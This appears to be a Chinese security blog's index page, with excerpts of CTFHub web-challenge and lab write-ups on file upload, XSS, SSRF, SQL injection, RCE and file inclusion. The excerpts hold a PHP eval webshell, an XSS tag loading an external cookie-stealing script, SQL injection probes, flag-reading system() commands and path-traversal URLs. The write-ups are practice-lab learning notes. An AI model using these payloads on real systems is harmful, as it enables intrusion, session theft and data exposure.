Kyon-H Blog

「离开世界之前 一切都是过程」

CTFHub Web 文件上传

CTFHub Web 文件上传

1. 文件上传 1.1. 无验证 构造一句话木马 shell.php 1 <?php echo 123;@eval($_POST['code']);?> 上传成功 蚁剑获取到 flag 文件 1.2. 前端验证 上传 shell.php.jpg bp 抓包修改后缀,上传成功,蚁剑连接 1.3. .htaccess 创建 .htaccess 文件...

CTFHub Web 密码口令

CTFHub Web 密码口令

1. 密码口令 1.1. 弱口令 bp 1.2. 默认口令 使用 admin 用户登录,显示用户不存在,尝试测试用户名,失败 浏览器搜索 eYou 默认账户名密码进行尝试 1 eyougw:admin@(eyou)

CTFHub Web 信息泄露

CTFHub Web 信息泄露

1. 信息泄露 1.1. 目录遍历 手动查找目录,找到 flag 1.2. PHPINFO 查看 phpinfo,搜索到 flag 1.3. 备份文件下载 1.3.1. 网站源码 bp 构造 payload,获取到 www.zip 文件,解压 文件中未找到,访问 flag_183531374.txt 获取到 flag 1.3.2. bak 文件 访问 inde...

CTFHub Web XSS

CTFHub Web XSS

1. XSS 1.1. 反射型 1 <script>alert(123)</script> #成功 注册 XSS 平台,填入 <sCRiPt sRC=//xs.pe/s2x></sCrIpT> 复制地址栏地址 sendURLtoBot 查看访问记录的 cookie 1.2. 存储型 1 2 <script>al...

CTFHub Web SSRF

CTFHub Web SSRF

1. SSRF 1.1. 内网访问 访问 [http://127.0.0.1/flag.php](http://127.0.0.1/flag.php) 1.2. 伪协议读取文件 http://127.0.0.1/flag.php 读取到???说明文件存在 php://filter/read=convert.base64-encode/resource=http://127.0....

CTFHub Web SQL 注入

CTFHub Web SQL 注入

1. SQL 注入 1.1. 整数型注入 1 2 3 4 1 #显示 1 and 1=1 #显示 -1 union select 1,2,3 #不显示 -1 union select 1,2 #显示 获取数据库和表 获取 flag 表字段 获取 flag 1.2. 字符型注入 1 2 3 # 字符型确认 ?id=1' and 1=1--+ ?id=1' and...

CTFHub Web RCE

CTFHub Web RCE

1. RCE 1.1. eval 执行 传入 cmd 参数 1 system("ls -lR / | grep flag"); 1 system("find / -name flag_14104"); 1 system("cat /flag_14104"); ctfhub{d3eaaa2187eddb495ba02f6e} 1.2. 文件包含 分析代码,...

Vuluhub靶场IP问题

Vuluhub靶场解决IP找不到问题

VMware导入ovf文件时提示导入失败,点击重试 在以下开机界面按下e键 进入到黑色界面中找到 ro quiet关键字,将其修改为 rw signie init=/bin/bash 修改结果如下 修改完后按下 Ctrl+X键,进入到root交互界面 ip a查看网卡名为 ens33 修改网卡配置文件,将 enp0s3改为 ens33 1 2 3 vi /e...

File Include

文件包含漏洞

1. 文件包含伪协议 1.1.1. 直接包含 1 2 http://pikachu.to/vul/dir/dir_list.php?title=../../../../../../../\windows\system32\drivers\etc\hosts http://pikachu.to/vul/dir/dir_list.php?title=../../../../../../win...

File-Upload

File-Upload

1. 文件上传漏洞介绍 几乎每个网站中都会有文件上传的功能,譬如上传头像、视频、压缩包等。网站上传功能点未对客户端上传的文件进行严格的限制和过滤,导致恶意用户将一些恶意的文件或脚本上传到服务器并 url 访问执行,进而达到控制网站的目的,这就是文件上传漏洞。 1.1. 文件上传漏洞前提 能成功上传木马或脚本 知道上传后的路径 上传的木马或脚本能被执行 图片马需要配合文...